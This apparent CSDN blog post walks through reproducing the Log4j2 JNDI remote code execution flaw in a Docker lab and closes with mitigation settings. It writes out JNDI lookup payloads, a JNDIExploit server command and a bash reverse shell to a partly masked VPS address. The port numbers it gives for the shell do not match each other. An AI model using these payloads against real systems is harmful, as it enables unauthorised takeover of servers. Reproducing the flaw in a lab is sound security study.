Apache_Log4j2_RCE漏洞复现

最新推荐文章于 2024-04-08 17:06:24 发布
最新推荐文章于 2024-04-08 17:06:24 发布
阅读量5k 收藏 3
点赞数 1
分类专栏: 漏洞复现 文章标签: apache 安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45495060/article/details/121939017
版权

漏洞描述:

Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。

影响范围:

Apache Log4j 2.x < 2.15.0-rc2

漏洞复现

1.环境搭建:

用的是github上的一个docker环境:log4j_vuln

1.1 拉取漏洞环境镜像

docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln

1.2 运行漏洞环境容器

 docker run -it -d -p 8080:8080 --name log4j_vuln_container registry.cnhangzhou.aliyuncs.com/fengxuan/log4j_vuln

1.3 进入容器中

docker exec -it log4j_vuln_container /bin/bash 

1.4 启动漏洞环境

/bin/bash /home/apache-tomcat-8.5.45/bin/startup.sh 

打开http://192.168.1.78:8080/webstudy/hello-fengxuan 出现以下页面,说明搭建成功。 

 

2.dnslog执行代码 

构造payload,POST提交,参数如下

c=${jndi:ldap://log4j2.xxxxxx.dnslog.cn}
c=${jndi:rmi://log4j2.xxxxxx.dnslog.cn}

 

 

3.执行命令 

在本地先要生成JNDI链接并启动后端相关服务,VPS注意防火墙开启相关端口,用的是JNDIExploit-1.2-SNAPSHOT.jar,同样本地先启动服务

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.1.78 -l 888 -p 80 

 

构造以下payload,发送请求,成功执行命令。

cmd: whoami

c=${jndi:ldap://47.xxx.xxx.xxx:888/TomcatBypass/TomcatEcho} 

 

4.反弹shell 

构造以下payload,反弹shell

cmd: bash -i >& /dev/tcp/47.xxx.xxx.xxx/5555 0>&1

c=${jndi:ldap://47.xxx.xxx.xxx:9999/TomcatBypass/TomcatEcho}

 

VPS服务器监听444端口,成功反弹shell。

 

其他测试靶场 

掌控安全

首页 - vulfocus

log4shell-vulnerable-app

修复方案

截止到目前,网上的修复方法大致是这些:

补丁链接: log4j-2.15.0-rc2

1.添加jvm启动参数-Dlog4j2.formatMsgNoLookups=true;

2.在应用classpath下添加log4j2.component.properties配置文件,文件内容为log4j2.formatMsgNoLookups=true;

3.JDK使用11.0.1、8u191、7u201、6u211及以上的高版本。

一笼管汤包
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
log4j2_rce 项目
02-23
这是存在log4j jndi注入的项目,可以用idea编译,用网上工具一遍
漏洞——log4j2-rce(CVE-2021-44228)
小林说安全的博客
05-29 1954
漏洞——log4j2-rce(CVE-2021-44228)
框架、组件漏洞系列3:log4j2-Rce漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
12-11 2240
前言: 漏洞环境来自于掌控者安全,在此深表感谢!!! 环境在“掌控者安全”,有兴趣的朋友可以去一下。上图略微有颜色,不过毕竟挖洞太乏味,需要让生活精彩嘛,介意请撤退。。 漏洞简介: Apache Log4j2是一款优秀的Java日志框架。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,经阿里云安全团队验证,Ap.
漏洞研究》Apache Log4j2 远程代码执行漏洞_apache log4j2远程代码执行漏洞
最新发布
m0_61549556的博客
04-08 527
链图片转存中…(img-KeUplu5V-1712567173286)][外链图片转存中…(img-AQ0BndUL-1712567173286)]
Apache Log4j2 RCE漏洞
huangyongkang666的博客
04-13 1949
Apache Log4j2 RCE漏洞 1.漏洞介绍 Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞。 影响版本:Apache Log4j 2.x<=2.15.0.rc1 漏洞编号:CVE-2021-44228 2.漏洞环境搭建 目标:Ubuntu ip: 192.168.241.129 攻击机 :kail ip: 192.168.241.128 由于我的Ubuntu虚拟机已经搭建过docker,直接用以下命令
Apache Log4j2 RCE 远程命令执行漏洞与分析
angry_program的博客
12-18 6415
Apache Log4j2 远程代码执行漏洞。由于Log4j2 组件在处理程序日志记录时存在JNDI 注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2 组件解析缺陷,实目标服务器的任意代码执行,获得目标服务器权限。本文主要漏洞过程和研究漏洞原理。
Log4j2 RCE 漏洞步骤以及根因
weixin_46073333的博客
12-12 6750
相信大家最近一定被log4j2的远程代码执行漏洞所刷屏了,各个互联网厂商,开源组织,还有相关企业都瑟瑟发抖,相关研发人员也都是加班加点紧急修和改正。笔者也看了一些相关文章,感觉不少都...
Log4j2 RCE漏洞分析
03-14
记录一下log4j2 RCE的原理
LOG4J RCE 漏洞分享与自查.pdf
12-15
LOG4J RCE 漏洞分享与自查
Apache Log4j2 RCE.md
07-09
Apache Log4j2 RCE
cve_2019_0708_bluekeep_rce:蓝皮漏洞利用
04-29
cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb ...
Log4j2-RCE
xlsj雪松的博客
12-26 2989
1 Log4j2漏洞官方描述 Apache Log4j2 版本 2.0-alpha1 到 2.16.0(不包括 2.12.3)没有防止自引用查找的不受控制的递归。当日志配置使用带有上下文查找的非默认模式布局(例如,$${ctx:loginId})时,控制线程上下文映射 (MDC) 输入数据的攻击者可以制作包含递归查找的恶意输入数据,导致 StackOverflowError 将终止进程。这也称为 DOS(拒绝服务)攻击。 Log4j 2.x 缓解措施 升级到 Log4j 2.3.1(适用于 Java
Apache Log4j2 RCE漏洞(CVE-2021-44228)
siu~
10-31 380
Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过 该漏洞构造特殊的数据请求包,最终触发远程代码执行。
Log4j2_RCE漏洞
01-01 1925
前端时间爆出的Log4j2_RCE漏洞可谓是让安全圈提前过年,今天来和简单分析下这个漏洞
Apache Log4j2 RCE 命令执行漏洞预警及修方案
HBohan的博客
12-12 1563
漏洞名称:Apache Log4j2远程代码执行漏洞 组件名称:Apache Log4j2 截止2021年12⽉10⽇,受影响的Apache log4j2版本: 2.0≤Apache Log4j<=2.15.0-rc1 漏洞类型:远程代码执行
Apache Log4j2 RCE漏洞利用反弹shell合集
热门推荐
yy
03-10 1万+
Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。
CVE-2021-44228:Apache Log4j RCE
Fly_鹏程万里
12-18 1388
文章前言 本篇文章我们主要介绍关于CVE-2021-44228:Apache Log4j RCE漏洞的自检与修,帮助甲方人员尽快修项目中存在的不安全依赖 漏洞概述 Apache Log4j2是⼀个基于Java的⽇志记录⼯具,该⼯具重写了Log4j框架,并且引⼊了⼤量丰富的特性,该⽇志框架被⼤量⽤于业务系统开发,⽤来记录⽇志信息,⼤多数情况下,开发者可能会将⽤户输⼊导致的错误信息写⼊⽇志中,由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执⾏漏洞。该漏洞
Apache Log4j2 (CVE-2021-44228)漏洞详细过程(docker)
weixin_45778886的博客
12-25 4985
环境 centos7(docker依赖环境),kali2019 环境搭建 1.使用 docker 拉取漏洞镜像 docker pull vulfocus/log4j2-rce-2021-12-09:latest 2.查看漏洞镜像并开启环境 docker images docker run -d -P vulfocus/log4j2-rce-2021-12-09 docker ps -a 3.访问漏洞环境,环境搭建完成 http://192.168.124.139:49153 漏洞
bugku apache log4j2 rce
03-16
bugku apache log4j2 rce是指一个漏洞,可以通过Apache Log4j2库中的一个特定功能,实远程代码执行(RCE)攻击。该漏洞可能会导致攻击者获取系统权限,进而对受害者进行攻击和控制。建议用户及时升级相关软件版本...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值